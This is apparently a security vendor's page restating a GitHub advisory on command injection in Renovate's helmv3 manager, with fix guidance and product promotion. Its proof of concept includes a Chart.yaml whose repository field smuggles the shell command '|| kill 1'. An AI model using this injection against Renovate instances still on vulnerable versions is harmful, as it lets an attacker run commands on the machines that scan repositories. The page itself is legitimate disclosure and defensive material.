How severe is GHSA-3f44-xw83-3pmg?

GHSA-3f44-xw83-3pmg has a CVSS score of 6.7/10, rated MEDIUM. Review your exposure and patch according to your risk tolerance.

Which packages are affected by GHSA-3f44-xw83-3pmg?

GHSA-3f44-xw83-3pmg affects the following packages: renovate (npm). Ecosystems affected: npm.

How do I fix GHSA-3f44-xw83-3pmg?

Update renovate to 40.33.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-3f44-xw83-3pmg is resolved across your whole dependency graph.

How do I detect GHSA-3f44-xw83-3pmg in my npm dependencies?

Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for renovate. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.

How do I mitigate GHSA-3f44-xw83-3pmg if there is no patch (or I can't update yet)?

If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.

How does O3 Security protect against GHSA-3f44-xw83-3pmg?

O3 pinpoints whether GHSA-3f44-xw83-3pmg is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Is GHSA-3f44-xw83-3pmg actively exploited in the wild?

No public exploit code has been indexed for GHSA-3f44-xw83-3pmg yet. This does not mean the vulnerability cannot be exploited — absence of public exploits does not imply safety. Apply the recommended fix and use O3 Security to monitor your exposure.

When was GHSA-3f44-xw83-3pmg published, and has it been updated?

GHSA-3f44-xw83-3pmg was published on January 13, 2026 and was last updated on February 3, 2026. Advisory data evolves as severity scores, affected ranges, and exploit intelligence are revised — always check the latest version of the advisory before acting.

📦 npm

GHSA-3f44-xw83-3pmg

MEDIUM

Renovate vulnerable to arbitrary command injection via helmv3 manager and malicious Chart.yaml file

Published

Jan 13, 2026

Updated

Feb 3, 2026

Affected

1 pkg

Patched

1 / 1

Exploits

None indexed

Blast Radius

1 pkg affected

Weekly download volume for affected packages — a proxy for how broadly this vulnerability is deployed.

renovatenpm

640Kdownloads / week

Description

Summary

The user-provided string repository in the helmv3 manager is appended to the helm registry login command without proper sanitization.

Details

Adversaries can provide a maliciously crafted Chart.yaml in conjunctions with a tweaked Renovate configuration file to trick Renovate to execute arbitrary code. The value for both uses of the repository variable in lib/modules/manager/helmv3/common.ts are not being escaped using the quote function from the shlex package. This lack of proper sanitization has been present in the product since version 31.51.0 (https://github.com/renovatebot/renovate/commit/f372a68144a4d78c9f7f418168e4efe03336a432), released on January 24 of 2022.

PoC

Create a git repo with the following content:

renovate.json5:

{
  $schema: "https://docs.renovatebot.com/renovate-schema.json",
  customDatasources: {
    always: {
      defaultRegistryUrlTemplate: "https://docs.renovatebot.com/search/search_index.json",
      transformTemplates: ['{"releases":[{"version":"99999.0.0"}]}'],
    },
  },
  // Register any credentials to make the manager attempt to use basic auth for the Helm registry
  hostRules: [
    {
      matchHost: "charts.bitnami.com",
      username: "un",
      password: "pw",
    },
  ],
  packageRules: [
    {
      // Target of the day
      matchManagers: ["helmv3"],
      // Don't consult the actual bitnami repo
      registryUrls: [],
      // But still, trick the manager in believing there's a new version
      overrideDatasource: "custom.always",
    },
  ],
}

Chart.yaml:

apiVersion: v2
name: renovate-aci-1
version: 0.0.1
dependencies:
  - name: redis
    version: 0.1.0
    repository: oci://charts.bitnami.com/bitnami || kill 1

Chart.lock:

dependencies:
- name: redis
  repository: oci://charts.bitnami.com/bitnami

Run Renovate against the repo from a Docker container. Notice that the process terminates without reporting "Repository finished", because the ACI vulnerability allowed for execution of kill 1, terminating the root process of the container.

[!NOTE] This specific proof of concept was made a lot simpler with the introduction of the overrideDatasource configuration since version 38.120.0 (https://github.com/renovatebot/renovate/commit/a70a6a376d31148e80be5a5c885ac33ff5ddb30c), released on October 12 of 2024, because it means that there is no more need for a proper response from an actual Helm registry on the malformed repository URL.

Impact

This is a Arbitrary Command Injection vulnerability, allowing those with write access on repositories configured to be scanned by Renovate to cause the execution of commands of their choice on the machine that runs Renovate.

Affected Packages

1 total 1 fixed

Ecosystem	Package	Vulnerable range	Fix
📦npm	`renovate`	≥ 31.51.0&&< 40.33.0	40.33.0

Detection & mitigation playbook

Open-source dependency

Detect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for renovate. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update renovate to 40.33.0 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-3f44-xw83-3pmg is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-3f44-xw83-3pmg is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.

Tailored to GHSA-3f44-xw83-3pmg. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.

Frequently Asked Questions

### Summary The user-provided string `repository` in the `helmv3` manager is appended to the `helm registry login` command without proper sanitization. ### Details Adversaries can provide a maliciously crafted `Chart.yaml` in conjunctions with a tweaked Renovate configuration file to trick Renovate to execute arbitrary code. The value for both uses of the `repository` variable in [lib/modules/manager/helmv3/common.ts](https://github.com/renovatebot/renovate/blob/b69416ce1745f67c9fc1d149738e2f52feb4f732/lib/modules/manager/helmv3/common.ts) are not being escaped using the `quote` function from

O3 Security · Impact-Aware SCA

Is GHSA-3f44-xw83-3pmg in your dependencies?

O3 detects GHSA-3f44-xw83-3pmg across npm dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.

Scan my dependencies How O3 SCA works